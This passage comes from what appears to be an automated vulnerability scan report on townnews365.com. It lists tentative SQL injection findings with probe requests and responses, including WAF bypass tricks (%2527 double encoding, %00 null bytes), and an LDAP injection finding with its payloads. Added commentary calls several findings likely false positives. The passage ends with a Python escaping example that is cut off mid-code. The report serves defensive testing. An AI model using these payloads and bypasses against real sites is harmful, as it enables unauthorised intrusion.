User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/section-sponsor1/f/3a/cdc/f3acdc2e-466e-11df-873f-001cc4c03286.image.jpg?1%2527%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:16 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.72. http://www.townnews365.com/tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif%00' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/weather-sponsor1/2/dd/9a2/2dd9a2f2-cf0e-11de-97ca-001cc4c03286.image.gif%00'' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:12 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.73. http://www.townnews365.com/tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif [REST URL parameter 8]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif

Issue detail

The REST URL parameter 8 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 8, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /tncms/ads/[random_number]/weather-sponsor1/4/97/098/4970987c-cf0e-11de-85aa-001cc4c03286.image.gif'' HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 No cache control present
Content-Type: text/html
Date: Sat, 14 May 2011 22:45:47 GMT
Connection: close
Content-Length: 28

417 No cache control present

2.74. http://www.townnews365.com/user-generated_solutions/enhanced_video/demonstration/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /user-generated_solutions/enhanced_video/demonstration/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /user-generated_solutions/enhanced_video/demonstration/?1'=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /user-generated_solutions/enhanced_video/demonstration/?1''=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

2.75. http://www.townnews365.com/user-generated_solutions/user_account_contributions/ [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /user-generated_solutions/user_account_contributions/

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /user-generated_solutions/user_account_contributions/?login_success=true HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751%2527; __utmb=121545751.6.10.1305412213; tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /user-generated_solutions/user_account_contributions/?login_success=true HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
Referer: http://www.townnews365.com/users/login/?referer_url=/user-generated_solutions/user_account_contributions/
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751%2527%2527; __utmb=121545751.6.10.1305412213; tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png

Response 2

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=300
X-TNCMS-Memory-Usage: 3879112
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:43:44 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5086
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp14
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 37636


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.76. http://www.townnews365.com/users/admin/service/purchase/ [service_id parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/admin/service/purchase/

Issue detail

The service_id parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the service_id parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the service_id request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/admin/service/purchase/?service_id=378%2527&referer_url=/user-generated_solutions/user_account_contributions/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/admin/service/purchase/?service_id=378%2527%2527&referer_url=/user-generated_solutions/user_account_contributions/ HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 403 Forbidden
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4009152
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:44:43 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.5807
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
X-Cache-Info: caching
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp16
Content-Length: 38053


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

2.77. http://www.townnews365.com/users/forgot/global/resources/images/icon-03.gif [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/forgot/global/resources/images/icon-03.gif

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/forgot/global/resources/images/icon-03.gif?1%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/forgot/global/resources/images/icon-03.gif?1%2527%2527=1 HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 417 Cache busting detected
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:44 GMT
Connection: close
Content-Length: 26

417 Cache busting detected

2.78. http://www.townnews365.com/users/forgot/global/resources/images/icon-04.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/forgot/global/resources/images/icon-04.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/forgot%2527/global/resources/images/icon-04.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/forgot%2527%2527/global/resources/images/icon-04.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:46:04 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.79. http://www.townnews365.com/users/login/global/resources/images/icon-03.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/login/global/resources/images/icon-03.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/login/global/resources%2527/images/icon-03.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/login/global/resources%2527%2527/images/icon-03.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:25 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.80. http://www.townnews365.com/users/login/global/resources/images/icon-04.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/login/global/resources/images/icon-04.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /users/login'/global/resources/images/icon-04.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/login''/global/resources/images/icon-04.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:19 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.81. http://www.townnews365.com/users/login/global/resources/images/icon-05.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/login/global/resources/images/icon-05.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /users'/login/global/resources/images/icon-05.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users''/login/global/resources/images/icon-05.gif HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:26 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Connection: close
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
X-Cache-Info: caching
Real-Hostname: townnews365.com
Content-Length: 680

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.82. http://www.townnews365.com/users/login/global/resources/styles/print.css [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/login/global/resources/styles/print.css

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. As with 2.81, the "error message" below is an HTTP 503 "Server Too Busy" page and the second response is the image server's 404 "Element not valid" page; neither comes from a database, so the finding is most likely a false positive.

The application appears to block SQL injection attacks, but the scanner reports that this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked. That inference rests on the same 503-versus-404 pair and should be treated with the same scepticism.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /users/login/global/resources/styles/print.css HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00'

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/login/global/resources/styles/print.css HTTP/1.1
Host: www.townnews365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=%00''

Response 2

HTTP/1.1 404 Not Found
Server: WWW
Cache-Control: public, max-age=600
Content-Type: text/html
Date: Sat, 14 May 2011 22:44:04 GMT
X-TN-ServedBy: cms.img.83
Force-Status: 1
Accept-Ranges: bytes
ETag: "1828397"
Last-Modified: Tue, 14 Oct 2008 18:45:00 GMT
Real-Hostname: townnews365.com
Content-Length: 680
Connection: close
X-Cache-Info: cached

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>    
<title>Element not valid</title>
<style type="text/css">
body { background-color: white;
color: black;

...[SNIP]...

2.83. http://www.townnews365.com/users/manage/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /users/manage/

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present. In the exchange below the single-quote request received an HTTP 503 "Server Too Busy" page from the front end and the double-quote request a 403 Forbidden from the application; the 503 is not a database error, so the difference does not by itself show that the Referer value reached a query.

The application appears to block SQL injection attacks, but the scanner reports that this can be circumvented by double URL-encoding the blocked characters, for example by submitting %2527 instead of the ' character. The same caveat applies: the two responses come from different layers, and the bypass needs manual confirmation.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /users/manage/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.8.10.1305412213
Referer: http://www.google.com/search?hl=en&q=%2527

Response 1

HTTP/1.0 503 Server Too Busy
Content-Length: 25
Content-Type: text/html

<h2>Server Too Busy</h2>

Request 2

GET /users/manage/ HTTP/1.1
Host: www.townnews365.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TNNoMobile=1; __utmz=121545751.1305412213.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tncms-authtoken=AULoDZRRVHwG+QY5uBp662RlILilY+otFEFrOPAoQbv+PTkv1TwIuf6JcRjrJv2GNga+Au0Ifo+uBZHcqsxewyk; tncms-screenname=Demo+User; tncms-avatarurl=http%3A%2F%2Fwww.townnews365.com%2Fcontent%2Ftncms%2Favatars%2F6%2Fc9%2F4bd%2F6c94bd0e-d884-11de-85c7-001a4bcf887a.png; __utma=121545751.773979980.1305412213.1305412213.1305412213.1; __utmc=121545751; __utmb=121545751.8.10.1305412213
Referer: http://www.google.com/search?hl=en&q=%2527%2527

Response 2

HTTP/1.1 403 Forbidden
Server: WWW
Vary: Accept-Encoding
X-TNCMS-Memory-Usage: 4009304
Content-Type: text/html; charset=UTF-8
X-TNCMS-Venue: app
Date: Sat, 14 May 2011 22:45:40 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.3827
X-PHP-Engine: enabled
Real-Hostname: townnews365.com
X-TNCMS-Served-By: cmsapp4
Connection: Keep-Alive
X-Cache-Info: cached
Content-Length: 38975


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<base href=
...[SNIP]...

3. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.townnews365.com
Path:   /submissions/

Issue detail

The REST URL parameter 1 appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner. In the exchange below, however, the first request was answered with an HTTP 417 "Rate limit exceeded" and the second with an HTTP 503 "Server Too Busy"; both come from the front end rather than from application code, so the difference says nothing about LDAP handling and the finding is almost certainly a false positive.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
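The two payloads above work because the first one, concatenated into a conjunctive filter, still yields a syntactically valid filter, while the second puts a bare `!` outside its own parentheses and is malformed; the scanner looks for a response difference between the two. The following added example (not code from the report or from the scanned site) shows the unsafe concatenation beside the remediation above: an allowlist for the value plus RFC 4515 escaping of the LDAP metacharacters. The filter template and the attribute names `uid`, `sn` and `objectClass` are assumptions; the payloads are the scanner's.

```python
import re

# Added example, not part of the scan report. The filter template and the
# attribute names (uid, sn, objectClass) are assumptions about what such an
# application might do; the payloads are the two the scanner sent.

# RFC 4515 section 3: these characters must appear as backslash + two hex digits.
_LDAP_SPECIAL = {'\\': '\\5c', '*': '\\2a', '(': '\\28', ')': '\\29', '\x00': '\\00'}


def ldap_filter_escape(value: str) -> str:
    """Escape a value for use inside an LDAP filter assertion.

    Each metacharacter becomes a backslash plus its two-digit hex code, so the
    server reads it as a literal character rather than as filter syntax.
    """
    return ''.join(_LDAP_SPECIAL.get(ch, ch) for ch in value)


def is_plain_identifier(value: str) -> bool:
    """The allowlist the remediation text recommends: short and alphanumeric."""
    return re.fullmatch(r'[A-Za-z0-9]{1,32}', value) is not None


def build_filter_unsafe(user: str) -> str:
    """The pattern the finding describes: raw input concatenated into the filter."""
    return '(&(uid=%s)(objectClass=person))' % user


def build_filter_escaped(user: str) -> str:
    """Escaping alone: the value can no longer add or close assertions."""
    return '(&(uid=%s)(objectClass=person))' % ldap_filter_escape(user)


def build_filter_safe(user: str) -> str:
    """Allowlist first, and escape what is accepted anyway, so that loosening
    the allowlist later does not silently reopen the injection."""
    if not is_plain_identifier(user):
        raise ValueError('rejected LDAP search value: %r' % user)
    return build_filter_escaped(user)


def assertion_count(ldap_filter: str) -> int:
    """Number of '(' the LDAP parser sees; escaped parentheses are not counted
    because they have become the literal text \\28 / \\29."""
    return ldap_filter.count('(')


SCANNER_PAYLOADS = ('*)(sn=*', '*)!(sn=*')

if __name__ == '__main__':
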